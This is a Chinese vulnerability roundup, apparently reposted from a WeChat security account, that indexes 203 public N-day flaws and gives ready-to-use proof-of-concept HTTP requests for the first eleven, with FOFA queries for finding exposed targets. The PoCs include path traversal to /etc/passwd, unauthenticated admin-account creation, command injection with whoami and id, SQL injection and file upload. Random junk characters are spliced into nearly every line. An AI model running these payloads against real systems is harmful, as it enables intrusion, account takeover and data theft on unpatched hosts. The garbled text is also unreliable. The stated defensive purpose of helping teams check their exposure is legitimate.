互联网公开漏洞整理202309-202406
* D* r/ z+ V' \$ n: @+ h道一安全 2024-06-05 07:41 北京6 p( o( c7 ~9 g1 c6 d
以下文章来源于网络安全新视界 ,作者网络安全新视界# D! e- G; l5 p* l1 c2 V* y" f
* Y; J, I7 }' g- H! |% L
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
( n0 S* X6 R6 m3 v4 i2 J% Y8 s1 @! @3 Q" C' i/ o
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
: p; l& ~- F3 _. x5 Q# s E ^- [ x8 g1 X; f' _6 U( s1 V X1 u
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
0 b' F: j$ s y# \; p# w9 O8 T
4 s& }' F5 W( S4 P9 B( O文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
. n1 d/ m* u! f( A& J5 p# w
( t8 n" K ]) {/ C合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
0 u9 l+ h! \9 V4 v) R i
0 }( u$ N2 Y2 A, b" p8 D, P/ L
) P( P! H; t4 F& N5 v声明) t2 n5 T# `' S# Y0 K
# v% D# l7 I- v/ V) g+ H. M! o9 U5 g为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
0 N% O/ ^# T( q/ P; e# J
) U' I4 {- d% `: B( P+ N有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
9 r- h9 u/ A. B( a
: ^: P9 e+ h" P1 L9 R5 ^7 h# q
+ i; f% Y8 g/ g4 }
- O3 q& H3 x& v3 ~& F0 ^! h; N目录& [* ] p, Q) H3 r! ]
3 p" t Z% E- c, ~+ p- n) Z01! E6 i' p" F" d0 h
9 g2 I+ D& [ e8 `) h" s* Z1. StarRocks MPP数据库未授权访问 S: a9 I1 w* P9 F0 U. w& \
2. Casdoor系统static任意文件读取
4 L7 v. m, ?. |7 i6 E! d! i' f' t+ Z3. EasyCVR智能边缘网关 userlist 信息泄漏
9 y H' L2 i8 b5 k0 y2 _1 G1 A% n( j" _4. EasyCVR视频管理平台存在任意用户添加
. g/ g& E: z: P5 {5. NUUO NVR 视频存储管理设备远程命令执行
9 y5 h/ l! U2 ]! d- _6. 深信服 NGAF 任意文件读取$ Z" E: y' T2 V4 W1 Q6 |
7. 鸿运主动安全监控云平台任意文件下载: \+ D3 T V0 J# s6 N
8. 斐讯 Phicomm 路由器RCE1 K3 _) [# g" R! H- l: n
9. 稻壳CMS keyword 未授权SQL注入0 t6 G4 T# s" | o$ M2 N4 q* U
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传) n; L+ l" B5 C) i
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
1 ?3 J6 m$ I8 l/ G12. Jorani < 1.0.2 远程命令执行
% d8 M/ B2 l4 T! N+ S13. 红帆iOffice ioFileDown任意文件读取( b% t: R, y2 K1 L" Z$ e7 S( \
14. 华夏ERP(jshERP)敏感信息泄露, F: T6 K! A1 \- u. l+ Z) Y
15. 华夏ERP getAllList信息泄露4 i' m; W2 a7 H7 L+ X+ Q! T9 v
16. 红帆HFOffice医微云SQL注入
) g6 [7 {) f0 {# l' P17. 大华 DSS itcBulletin SQL 注入
[; R+ {6 y! y* P18. 大华 DSS 数字监控系统 user_edit.action 信息泄露+ X6 [# O! }! a/ \% K
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入' X0 `+ w. ~ ?8 O. q! R2 y) w8 C7 i6 c
20. 大华ICC智能物联综合管理平台任意文件读取
2 M% S, [" e& |! N0 c21. 大华ICC智能物联综合管理平台random远程代码执行5 a9 L5 t1 u6 v0 |2 L! [ F
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 q/ }, C9 x9 v& S" d" s" _23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
0 O( q2 r' S, I8 ~3 V' P8 y* F24. 用友NC 6.5 accept.jsp任意文件上传
& c/ }4 h& I5 J: i2 S25. 用友NC registerServlet JNDI 远程代码执行; M x8 [( @. h6 p
26. 用友NC linkVoucher SQL注入
; `" y" J0 G' d/ ~" \27. 用友 NC showcontent SQL注入0 M! Q4 x+ k: s& I
28. 用友NC grouptemplet 任意文件上传
0 {7 J7 }1 e" x; Z# u29. 用友NC down/bill SQL注入
e( Z$ {* n4 C+ ]* C30. 用友NC importPml SQL注入+ L! v- Z# A8 m5 e: W' a
31. 用友NC runStateServlet SQL注入
- W* n3 q% ~( c+ A2 U/ m) T32. 用友NC complainbilldetail SQL注入9 I- v+ b- B: \% E; t7 b
33. 用友NC downTax/download SQL注入7 A5 M* u3 P7 ], u/ k T
34. 用友NC warningDetailInfo接口SQL注入
3 `' ~; ~% G o35. 用友NC-Cloud importhttpscer任意文件上传" h: b8 I) j; M7 [) Q/ O( P& p
36. 用友NC-Cloud soapFormat XXE/ \# T& R5 j( C% u# f
37. 用友NC-Cloud IUpdateService XXE
' U8 e7 }! q- \$ Y5 K/ E38. 用友U8 Cloud smartweb2.RPC.d XXE$ E: n3 V U' a) V" Y$ f( F- ^
39. 用友U8 Cloud RegisterServlet SQL注入
2 M3 F2 q( l. ^7 `0 u40. 用友U8-Cloud XChangeServlet XXE
5 c) k$ h( |7 ~4 n( l g4 g) e41. 用友U8 Cloud MeasureQueryByToolAction SQL注入3 h7 d6 o, A( I u
42. 用友GRP-U8 SmartUpload01 文件上传3 m! f H5 j+ D
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
- N9 b9 f; d9 E6 r" y" C! T {* Q44. 用友GRP-U8 bx_dj_check.jsp SQL注入3 M2 _+ K2 g7 B: M: i
45. 用友GRP-U8 ufgovbank XXE7 g( U7 M/ i% ~3 Z2 K6 l
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
2 q! ^) M' _9 x4 H+ L47. 用友GRP A++Cloud 政府财务云 任意文件读取
6 j/ ?! l/ j4 M, m$ g48. 用友U8 CRM swfupload 任意文件上传: B0 @, d+ @/ N
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
6 ?9 ~/ H8 K1 h! l& A50. QDocs Smart School 6.4.1 filterRecords SQL注入/ E1 q; @3 y; W
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
- b, `( {: b1 d; W# R- ~52. 泛微E-Office json_common.php sql注入
) r6 ?! Y: Z* T# d' i7 e7 X$ g7 U6 N53. 迪普 DPTech VPN Service 任意文件上传
0 H, Y2 e, z b1 l. G2 a54. 畅捷通T+ getstorewarehousebystore 远程代码执行
( t6 X& O% @4 x, T9 f55. 畅捷通T+ getdecallusers信息泄露
* s' @! y$ ^8 p, R* d56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE" n, |/ H$ h9 i2 f# }
57. 畅捷通T+ keyEdit.aspx SQL注入1 B4 _- }* D z' g- R8 @
58. 畅捷通T+ KeyInfoList.aspx sql注入
7 Z( V1 V: S) d* f. V5 V59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
. A% s% l6 }- ~+ j9 A60. 百卓Smart管理平台 importexport.php SQL注入2 S3 K8 p9 M3 P' B& T: ?& h- y
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
6 O* X. C, c, L; e! P62. IP-guard WebServer 远程命令执行0 u) p9 k# S' J& @
63. IP-guard WebServer任意文件读取1 I* q. h& ^1 o d" H0 x' R
64. 捷诚管理信息系统CWSFinanceCommon SQL注入5 K' s; J* C- W& l
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过; i( y. F1 ? d3 L; a' u1 b
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" H* c8 r! @4 R0 ?+ ^
67. 万户ezOFFICE wpsservlet任意文件上传8 {! o- p. K- ^9 I( P) h
68. 万户ezOFFICE wf_printnum.jsp SQL注入& t* \9 [# @, ~9 v7 @6 j
69. 万户 ezOFFICE contract_gd.jsp SQL注入 t+ ^# `/ F. S) K% H
70. 万户ezEIP success 命令执行1 y" `, F* I2 h3 \% ~ y* l9 d
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入, f% C9 c, x% G, B; ^1 U- E
72. 致远OA getAjaxDataServlet XXE
8 D) d5 u: G5 Z- @2 ~73. GeoServer wms远程代码执行+ q$ x. d$ J5 f$ A& C
74. 致远M3-server 6_1sp1 反序列化RCE$ q& M# Z6 Y1 a+ V& I2 ?# M9 K9 o
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE8 Y3 |7 Z7 ^3 K' v& P
76. 新开普掌上校园服务管理平台service.action远程命令执行0 C' I. ~5 k9 }) Z
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
9 L1 O2 m% J+ F% J; W. B78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传. b, G% M1 d! s, s. k4 r
79. BYTEVALUE 百为流控路由器远程命令执行' L; n$ X) R; H
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
7 B: G: e4 L Y B81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 V. U' H4 c& d4 K# R
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行3 G2 O8 u9 n# |7 q
83. JeecgBoot testConnection 远程命令执行
' d5 k1 C! Y. {6 N84. Jeecg-Boot JimuReport queryFieldBySql 模板注入/ K, p1 E) q# s8 D
85. SysAid On-premise< 23.3.36远程代码执行( X5 Q) C' E' ^0 W/ r3 ]
86. 日本tosei自助洗衣机RCE
$ F+ s* R W4 Z87. 安恒明御安全网关aaa_local_web_preview文件上传
, ^7 u7 i; z' Z g- l88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行& V- |+ j9 M9 F* n, y# F2 y* m
89. 致远互联FE协作办公平台editflow_manager存在sql注入
0 f! A, h! D# Q& o% U7 J4 ~7 L90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
) E& D# \3 g& ~91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
/ m$ ^9 a+ O( `" L o92. 海康威视运行管理中心session命令执行8 e( f/ F! I2 \2 _6 ]1 {9 `
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
0 ]: |& n0 z& u H94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传$ p/ M2 [2 s% k0 S" Q& s: `
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
9 h; j1 [1 l. E+ l96. Apache OFBiz 18.12.11 groovy 远程代码执行+ X# T E3 s" S7 R# ]2 p: v
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
* ^& [( H9 I" {5 ~, ^/ h98. SpiderFlow爬虫平台远程命令执行2 r9 O8 F; y% ~& A* U8 ?) @
99. Ncast盈可视高清智能录播系统busiFacade RCE
# }# _4 ~! Q. U$ p9 ?; q100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
7 r7 k4 I6 _* A101. ivanti policy secure-22.6命令注入9 y2 b" q j2 z+ R- N) V" y
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行$ g7 S- H' [& v2 _
103. Ivanti Pulse Connect Secure VPN XXE
o [- y/ _4 f, e0 ^% o104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
7 r( H& N5 i; n- f$ R4 D* M105. SpringBlade v3.2.0 export-user SQL 注入$ O& y' J: z& g
106. SpringBlade dict-biz/list SQL 注入
/ |, ^; u- q: N0 y2 i: h( k) e107. SpringBlade tenant/list SQL 注入4 K+ j$ f0 h/ T4 b( a: P4 \
108. D-Tale 3.9.0 SSRF0 F: A5 i- T% M8 G, t6 y/ [
109. Jenkins CLI 任意文件读取! w9 _1 W) I9 r
110. Goanywhere MFT 未授权创建管理员
% }' t- Y! ? m/ J1 m" P7 ~111. WordPress Plugin HTML5 Video Player SQL注入0 `8 s) e: |7 Z! M5 [2 _
112. WordPress Plugin NotificationX SQL 注入7 h- P1 {/ W& k& j' ?
113. WordPress Automatic 插件任意文件下载和SSRF- n8 N5 Z; H3 ~& ^' l; b) _
114. WordPress MasterStudy LMS插件 SQL注入& v7 V8 p* l% S0 V/ p
115. WordPress Bricks Builder <= 1.9.6 RCE# `6 v( Q" b h+ p
116. wordpress js-support-ticket文件上传3 n' m' k7 X: Y2 ?# |& O4 ?/ z
117. WordPress LayerSlider插件SQL注入8 F1 ]% A7 u; s: Q
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
/ I; b' R9 w$ O8 U$ d3 x) Q119. 北京百绰智能S20后台sysmanageajax.php sql注入9 D" m9 B* b& D. u7 R$ ^. \: e
120. 北京百绰智能S40管理平台导入web.php任意文件上传, ~) `8 ^9 h" \* l
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
U/ y6 p2 }" Z9 C$ _) Y122. 北京百绰智能s200管理平台/importexport.php sql注入
6 y. d8 c5 a. B K123. Atlassian Confluence 模板注入代码执行, n, j3 ^) z2 D J4 u9 Y* L" e/ O
124. 湖南建研工程质量检测系统任意文件上传; C& G( R. |7 Z# D8 R
125. ConnectWise ScreenConnect身份验证绕过 w' ]" c+ F, ~) B! Q0 k) R
126. Aiohttp 路径遍历
9 E; a: X! I5 B' F# u3 T! T127. 广联达Linkworks DataExchange.ashx XXE# j/ `, X8 q t/ }' H" Y
128. Adobe ColdFusion 反序列化
2 z* H, K7 k. G! y0 N129. Adobe ColdFusion 任意文件读取
6 G! d( Q5 c9 b9 R2 ?130. Laykefu客服系统任意文件上传
* [4 z+ t! T2 x' M8 C131. Mini-Tmall <=20231017 SQL注入4 A/ Y; a2 n0 K& Y/ l
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
* x, @( {& D' B/ S& D2 ~ a133. H5 云商城 file.php 文件上传3 f/ k/ T+ Y9 ^
134. 网康NS-ASG应用安全网关index.php sql注入$ S8 z7 L3 z9 ~% [1 j
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入0 K) t4 B" A; e3 s* f7 q
136. NextChat cors SSRF
$ a. ?3 _+ y2 B2 o" T. Q% Z+ f137. 福建科立迅通信指挥调度平台down_file.php sql注入
$ w% L, w+ B& z6 [: }! ~" y# h138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
/ y% g @% o& ]0 x6 b139. 福建科立讯通信指挥调度平台editemedia.php sql注入' ]5 J6 f" y' Y( _2 o( [
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入1 {2 ~. R& k! e p* M
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
. o4 {3 W2 f% Z% k142. CMSV6车辆监控平台系统中存在弱密码+ Z9 J& `# ?! A+ X- s* g3 R6 I
143. Netis WF2780 v2.1.40144 远程命令执行3 {7 {& X Y) x0 @* l8 D
144. D-Link nas_sharing.cgi 命令注入
9 n2 V8 ]- _$ X! S' V9 A145. Palo Alto Networks PAN-OS GlobalProtect 命令注入 v) ?, y3 X5 t d
146. MajorDoMo thumb.php 未授权远程代码执行+ E O9 K5 h* J
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
! s! i6 ^9 S/ I148. CrushFTP 认证绕过模板注入
5 `4 {) e5 Y- J7 [' x6 n149. AJ-Report开源数据大屏存在远程命令执行3 C+ y$ X Y% x( e
150. AJ-Report 1.4.0 认证绕过与远程代码执行8 m+ U! ~0 {- J1 }" v$ ^
151. AJ-Report 1.4.1 pageList sql注入
1 h& d7 o( K) n$ T0 f152. Progress Kemp LoadMaster 远程命令执行1 X" v1 [* G, i9 \* o3 J: I
153. gradio任意文件读取2 ~3 k& w4 Z% r3 K
154. 天维尔消防救援作战调度平台 SQL注入
+ x. s* v3 i- k155. 六零导航页 file.php 任意文件上传4 W1 \2 t E2 J, B1 O' Y
156. TBK DVR-4104/DVR-4216 操作系统命令注入
, F: m- R$ x9 M3 |4 z157. 美特CRM upload.jsp 任意文件上传
$ E: [) p3 A6 E- c8 f158. Mura-CMS-processAsyncObject存在SQL注入
/ I2 a0 I& g, P4 d& v159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传( y4 O7 T3 b3 E3 A' l; U
160. Sonatype Nexus Repository 3目录遍历与文件读取
9 [5 g: y! Y$ {) c161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
# n6 S( D" Z- j' g0 k162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传- L' R, P) v; D3 r& S" J
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传2 I' Y! l( g3 Q, t" r$ d4 h
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
" }2 v, [; G) |* x. o165. OrangeHRM 3.3.3 SQL 注入
4 D; Q8 j i2 {* E' s166. 中成科信票务管理平台SeatMapHandler SQL注入
9 D P9 z/ P# ~6 m167. 精益价值管理系统 DownLoad.aspx任意文件读取0 x+ T3 X3 Z% U# E
168. 宏景EHR OutputCode 任意文件读取5 `; D. {! ~4 R; J) x0 ^
169. 宏景EHR downlawbase SQL注入+ T2 a' K* Z5 S; [. w3 ?
170. 宏景EHR DisplayExcelCustomReport 任意文件读取! k( x, G( ~8 G* k: x o. f/ a
171. 通天星CMSV6车载定位监控平台 SQL注入
+ X2 @ H- M/ k+ T+ k172. DT-高清车牌识别摄像机任意文件读取
. V$ B1 b2 R1 R/ y, _173. Check Point 安全网关任意文件读取& `6 U4 x. i; [/ {
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
: x p# l7 w" c1 _4 i- X175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
1 R# k; i, A" | M1 m. N% A176. 电信网关配置管理系统 rewrite.php 文件上传6 s" [2 E1 L0 G4 x8 z# J
177. H3C路由器敏感信息泄露
# \# l* W. x& b# k5 J# v. K178. H3C校园网自助服务系统-flexfileupload-任意文件上传8 A2 c q" n& g m, A. k
179. 建文工程管理系统存在任意文件读取
# I& D$ @( t% k! c5 P1 ^5 l180. 帮管客 CRM jiliyu SQL注入% D c/ Y# E3 o0 _6 Q( t9 L
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入, s' o. s, m4 M0 d
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建" }- V" C$ [; K2 @1 p& _# W0 D
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入! t Q& l9 D" c. z: }1 s) V- E
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
/ W9 g0 _" T; V0 b/ ]! d6 w1 \; n185. 瑞友天翼应用虚拟化系统SQL注入
" W- M1 p1 m* I' h/ w, Y186. F-logic DataCube3 SQL注入2 ?3 i( Q& w& W: |
187. Mura CMS processAsyncObject SQL注入. b9 A1 r9 g, T( y2 Y- w. L
188. 叁体-佳会视频会议 attachment 任意文件读取
2 f5 I% p) ^( E/ i189. 蓝网科技临床浏览系统 deleteStudy SQL注入
0 X* ?! Z" u( k; ^5 v f1 U% c3 G190. 短视频矩阵营销系统 poihuoqu 任意文件读取
3 H; b' P7 e( |4 E* D191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入' t9 p) T! C! D& D3 L y8 N
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
+ `3 H* x- G3 V2 {. Q& U5 m/ ?193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
* }# i; ~9 {5 l N# {194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传2 ]; ^) a. X2 c# o) f
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行) Z$ W! F; X( L( L) P0 O
196. 河南省风速科技统一认证平台密码重置9 t* m5 o7 B: a' G4 Z9 g
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
# \2 X2 D' b3 g: r9 P198. 阿里云盘 WebDAV 命令注入
1 O. r2 ^7 O/ d199. cockpit系统assetsmanager_upload接口 文件上传- z, S6 p& ~8 y& [5 \4 F
200. SeaCMS海洋影视管理系统dmku SQL注入
7 x4 {: L8 j* @201. 方正全媒体新闻采编系统 binary SQL注入+ }5 m! W- i8 N& Q
202. 微擎系统 AccountEdit任意文件上传8 \- Y2 ]7 ]7 z" `
203. 红海云EHR PtFjk 文件上传9 Q \2 _& T( N) ^
/ x3 S5 l. M8 ^* {/ l; u6 L
POC列表6 O0 g# k' q/ j/ }% i
~8 I0 H9 ] m, K
02
8 G- h- P8 \" q9 ^
% b0 N" @! B! |6 e& t1. StarRocks MPP数据库未授权访问& v* z5 F+ e# n
FOFA :title="StarRocks"
- O0 T" _+ c+ K: fGET /mem_tracker HTTP/1.1& p% Z# J5 k ^6 D0 ^9 H1 f8 W
Host: URL& n4 B0 E0 B! \0 T6 h7 p2 M
6 { T) V5 v7 H9 q# A( d0 b' _( S4 @3 I2 { C. E7 t
2. Casdoor系统static任意文件读取' U+ P: d3 y. ]
FOFA :title="Casdoor"
2 O% L5 O2 X" S/ r5 E0 ]. qGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
# Q) R* d3 \9 v# J ^/ C8 [1 bHost: xx.xx.xx.xx:99997 {) t; X7 a9 [8 m! V$ ~1 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 y0 Q( M- q/ y+ j9 w& U* J
Connection: close
2 K+ t2 e; b/ t6 oAccept: */*
2 h9 a6 h% {8 s1 X! y' ~/ C. kAccept-Language: en
# L9 B( m4 t2 d [$ ]* l+ BAccept-Encoding: gzip/ h5 i* v, y2 Q- c* Z: W' \
, @* [% q) B' }3 f* Y
5 x0 r" ^" x4 M, y' N# T2 r3 {3. EasyCVR智能边缘网关 userlist 信息泄漏: Y+ L8 B/ y8 V# S
FOFA :title="EasyCVR"
* r( K' d& Q+ u {GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1/ Q4 i7 s6 R# @) E
Host: xx.xx.xx.xx @/ Y9 ~$ r; a
7 t4 [6 P" Q0 J5 H! a' b( [3 B+ a, z8 D
- M" n4 |6 p: r7 g4. EasyCVR视频管理平台存在任意用户添加
4 a: S- K& Y+ [2 d! w- ~ U3 {1 bFOFA :title="EasyCVR"
) [ o8 g- O ^9 ?3 U7 j
3 t. D X6 ^% k% ]* f; s0 u5 `password更改为自己的密码md5
( q, r/ G5 c3 CPOST /api/v1/adduser HTTP/1.1
' X+ S2 S+ V" t# _4 |Host: your-ip
4 c' y7 C1 v9 rContent-Type: application/x-www-form-urlencoded; charset=UTF-8
* B- O w8 B8 e2 H9 _7 ^
$ I9 }4 X) A8 H0 ]( o& ?3 lname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
5 b+ Y+ o7 N9 _ l& }3 Y( Y+ F+ k& D6 a4 I8 D
" L% b V3 l& b @! e9 v5. NUUO NVR 视频存储管理设备远程命令执行
$ F" D6 \: Z9 P6 s. z3 y: G$ UFOFA:title="Network Video Recorder Login"( X; E& i4 D$ C4 C1 @
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.15 R2 ~% R$ {" s$ w+ f
Host: xx.xx.xx.xx! ^4 _, }" I% ]) D8 a! G4 u% s
' ]0 e" P6 Z2 X |" ]! G
2 E2 w/ X! Q$ E4 V" P' P( B6. 深信服 NGAF 任意文件读取 q3 D. F4 Q6 L( g; [ K
FOFA:title="SANGFOR | NGAF", y! E7 c2 U9 r" m& C# t T
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
o0 g6 t/ s8 T- c/ Y( G9 G+ C9 aHost:
& L! E! }, Y% T0 N4 _9 ]2 d: `+ O5 ~
& J- l) [& q& L T2 z* t4 v
7. 鸿运主动安全监控云平台任意文件下载
0 ]9 D7 u4 W7 D+ G; D I8 rFOFA:body="./open/webApi.html"0 y4 d& |7 b/ F, I
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1& V( _- G2 [6 ]
Host:
: m5 F2 s3 @ y0 ?- F, _
2 r& ~( ^- }: V6 x
+ k1 W, }/ x8 Q2 @9 g8. 斐讯 Phicomm 路由器RCE& H0 |& Q1 M. C, Y$ @& a
FOFA:icon_hash="-1344736688"4 z* _& ^. A1 S
默认账号admin登录后台后,执行操作8 @3 F& r- o7 a6 T
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
5 k, ?+ B5 B b8 H& {/ UHost: x.x.x.x6 o8 c) Y U( M$ @" E9 {
Cookie: sysauth=第一步登录获取的cookie# C/ N1 X$ _$ \ w0 ^" v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz- b3 e/ l2 q) U* w/ R5 a h
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
+ t3 n) X& ]2 J; G) C/ T5 d X$ T5 k N9 |% W. }
------WebKitFormBoundaryxbgjoytz) j$ B& j! ?5 s" x
Content-Disposition: form-data; name="wifiRebootEnablestatus"# C* [9 X: V* C
1 h* p) R/ L6 j% C
%s- _" O+ l6 f S
------WebKitFormBoundaryxbgjoytz1 B1 Q" H' Y) H- \2 R/ u
Content-Disposition: form-data; name="wifiRebootrange"
2 Y' F z" n3 p+ _: N Y8 J
$ u0 P* m9 r8 g% ~5 L/ M4 S12:00; id;) D, a, {1 ]5 L& N& F% P5 J) ~
------WebKitFormBoundaryxbgjoytz& `. {" A& {4 n
Content-Disposition: form-data; name="wifiRebootendrange"
2 m' n1 }) N0 B: v1 R" {; B
) T/ t5 j0 g7 S2 x0 Y* W%s:
: i7 S( |; ~4 h9 j J- Q------WebKitFormBoundaryxbgjoytz
2 C. C' [, V uContent-Disposition: form-data; name="cururl2"# J, u. K/ ^! s5 y% h
/ g0 ?5 p" K! o( _1 c
+ ]. G0 y/ R; V! z- Y------WebKitFormBoundaryxbgjoytz--3 k3 }( ~$ _3 G# N! R7 n
- F0 ?* A6 X% a1 ?9 l1 Z/ L/ Z/ f/ V
9. 稻壳CMS keyword 未授权SQL注入7 r" i8 A! `% h1 g/ z+ l
FOFA:app="Doccms"0 f8 W. J1 S Q) F$ U$ q8 T
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
+ G% H4 K- I# S' ]8 v& M$ ZHost: x.x.x.x
0 H, b+ i( A2 |5 X+ _% ~0 M
8 Z1 `3 Y8 p* R; w: b% m
. y: j5 ]$ G% y6 E! { M! H6 vpayload为下列语句的二次Url编码
$ Y& x+ F% R6 i( a7 d
2 c$ _0 v& T3 }7 L* r5 i' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#+ i. o7 [8 \) |1 h2 w* q2 o( f; D0 o
( Z' ]" u8 _- T+ z3 U M10. 蓝凌EIS智慧协同平台api.aspx任意文件上传- [- [5 ?, Z$ A8 L" K- s& u2 I% a
FOFA:icon_hash="953405444"
1 M) l1 Z, w+ O- v( _+ k# P V9 U) s% F
文件上传后响应中包含上传文件的路径
# M& C- E6 Z; A3 @9 H& e NPOST /eis/service/api.aspx?action=saveImg HTTP/1.1# r/ S# A! K9 A: @1 y6 M8 w
Host: x.x.x.x:xx4 e4 K1 y; s; ^- L2 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
4 T5 }9 |; z% V CContent-Length: 197
4 i4 I" T9 R0 A$ c5 e( WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ i: w2 L9 A% f! @
Accept-Encoding: gzip, deflate
$ T0 E s. G( j5 R g# E0 m# p/ mAccept-Language: zh-CN,zh;q=0.9
5 }8 W# `" e# k) X! I0 t( bConnection: close# D) D% ^, s( M
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
0 A' d% Z) m! _ p0 ^0 Q3 s4 n! K. m; [$ K
------WebKitFormBoundaryxdgaqmqu
; ^: g5 M1 K# m/ IContent-Disposition: form-data; name="file"filename="icfitnya.txt"$ Z1 E$ x- F# `" Q! u3 i
Content-Type: text/html, ? @- Y2 G" ]; r( `: ?% ?6 V5 x
1 t( L3 `$ l$ Q9 j
jmnqjfdsupxgfidopeixbgsxbf
( N( h' `% T4 a; G; W# t------WebKitFormBoundaryxdgaqmqu--6 w* B4 {- j+ D' r
$ S0 T" q0 M* D. H
1 M! D- G: s9 r4 b8 X! a11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入# ~8 P* E7 d; [; o9 ^
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"7 T# |0 \1 J. f1 U: H
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1 f' _; p7 Q5 ?4 E0 z% l
